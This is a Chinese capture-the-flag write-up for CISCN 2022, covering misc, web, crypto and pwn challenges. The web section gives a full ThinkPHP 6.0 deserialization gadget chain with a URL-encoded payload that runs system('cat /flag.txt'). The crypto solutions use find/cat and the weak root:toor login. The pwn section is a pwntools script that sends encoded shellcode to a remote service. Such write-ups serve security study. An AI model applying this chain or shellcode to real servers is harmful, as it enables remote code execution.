CISCN 2022 Writeup
感觉今年的题目比去年的简单些,三道密码非预期。好朋友帮忙做了150道选择题,然后出了六道CTF题就下线划水了~
Misc
签到电台
首先根据题干,向公众号发送关键字得到 hint
打开题目环境,发现密码本,然后根据公众号的提示,7*4个数字也就是前28位
点击纯数字模式,取前 28 位:
1272685121234614783219665440
然后 弼时安全到达了
所对应的7个电码:
1732 2514 1344 0356 0451 6671 0055
先 get请求
启动电报机
/send?msg=s
然后 get请求
模十之后的 28 位数字:
/send?msg=2904836534674960728375375495
WEB
ezpop
tp6.0 的反序列化,直接百度搜一个 exp 就行了(ThinkPHP6.0 反序列化链审计与分析:https://forum.butian.net/share/1168),我们只需要找到反序列化点。经过 dirsearch 扫描,发现存在 www.zip 文件,然后在 index.php 控制器里存在反序列化点:
<?php
namespace think {
use think\route\Url;
/**
 * Stand-in for the framework's think\Model, declared only so that serialize()
 * emits the same class name, property visibilities and declaration order as
 * the real class (compare the mangled keys \0think\Model\0lazySave and
 * \0*\0withEvent in the URL-encoded payload further down the page).
 */
abstract class Model
{
// Declaration order here is the field order in the serialized output.
private $lazySave;
private $exists;
protected $withEvent;
protected $table;
private $data;
private $force;
public function __construct()
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->table = new Url();   // nested think\route\Url instance, declared below
$this->force = true;
$this->data = ["1"];        // single-element array; why "1" is not shown on this page
}
}
}
namespace think\model {
use think\Model;
/**
 * Concrete subclass of the abstract Model so an instance can be built; this is
 * the outermost object in the serialized string (O:17:"think\model\Pivot").
 */
class Pivot extends Model
{
function __construct()
{
parent::__construct();   // all state is set by Model's constructor
}
}
// Build the object graph and print it URL-encoded so it can be passed as a
// query-string value. Defensive note: the server-side fix is to never hand
// request data to unserialize(); prefer json_decode(), or at least call
// unserialize($s, ['allowed_classes' => false]) so no object is instantiated.
$b = new Pivot();
echo urlencode(serialize($b));
}
namespace think\route {
use think\Middleware;
use think\Validate;
/**
 * Stand-in for think\route\Url. Only the four protected properties matter;
 * none of the framework's methods are reproduced here.
 */
class Url
{
protected $url;
protected $domain;
protected $app;
protected $route;
public function __construct()
{
$this->url = 'a:';
// A string holding PHP source (open tag plus a system() call). This page does
// not show where the framework writes or evaluates the value; the linked
// ThinkPHP 6.0 analysis above covers the chain. From the defender's side this
// is why unserialize() on request input must be treated as code execution.
$this->domain = "<?php system('cat /flag.txt');?>";
$this->app = new Middleware();   // think\Middleware, declared below
$this->route = new Validate();   // think\Validate, declared below
}
}
}
namespace think {
use think\view\driver\Php;
/**
 * Stand-in for think\Validate. The `type` property is not declared, so it is
 * created dynamically and serialized as a public field (s:4:"type").
 */
class Validate
{
public function __construct()
{
// Callable-shaped array [object, method name] keyed by 'getDomainBind'.
$this->type['getDomainBind'] = [new Php(), 'display'];
}
}
/**
 * Stand-in for think\Middleware with a single dynamic `request` property.
 */
class Middleware
{
public function __construct()
{
// Arbitrary-looking string; presumably only its presence as a string matters —
// not verifiable from this page.
$this->request = "sp4c1ous";
}
}
}
namespace think\view\driver {
/**
 * Stand-in for think\view\driver\Php. It carries no state; it only needs to
 * exist so the serialized output contains an object of this class name
 * (O:21:"think\view\driver\Php":0:{}).
 */
class Php
{
public function __construct()
{
}
}
}
payload
// ?s=index/test或者/index.php/index/test
a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D
密码
基于挑战码的双向认证 & 基于挑战码的双向认证2
ssh 连上后直接用 find 搜索 flag:
find / -name 'flag*'
cat /root/cube-shell/instance/flag_server/flag*
第一个flag是 基于挑战码的双向认证
第二个是 基于挑战码的双向认证2
基于挑战码的双向认证3
非预期,账号密码 root:toor 是弱口令:
cat /root/cube-shell/instance/flag_server/flag*
PWN
login-nomal
定位到 main > sub_FFD(),很明显是对 sc 的执行。
from pwn import *  # pwntools (third-party, not stdlib)
context.arch = 'amd64'
context.log_level = 'debug'  # echoes every byte sent/received
# p = process('./login')  # local run against the binary instead of the remote service
p = remote('123.56.87.204', 36979)
# First exchange: message "ro0tt" with option 1, sent once the ">>" prompt appears.
pl = "msg:ro0tt\nopt:1\n"
p.sendlineafter(">>", pl)
# Opaque blob forwarded as the second message. The prose above says sub_FFD()
# executes "sc" — presumably shellcode in some text encoding; neither the
# encoding nor the binary's parsing is shown here, so treat it as unverified.
key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
pl = "msg:" + key + "\nopt:2\n"
p.sendlineafter(">>", pl)
p.interactive()  # hand the connection over to the terminal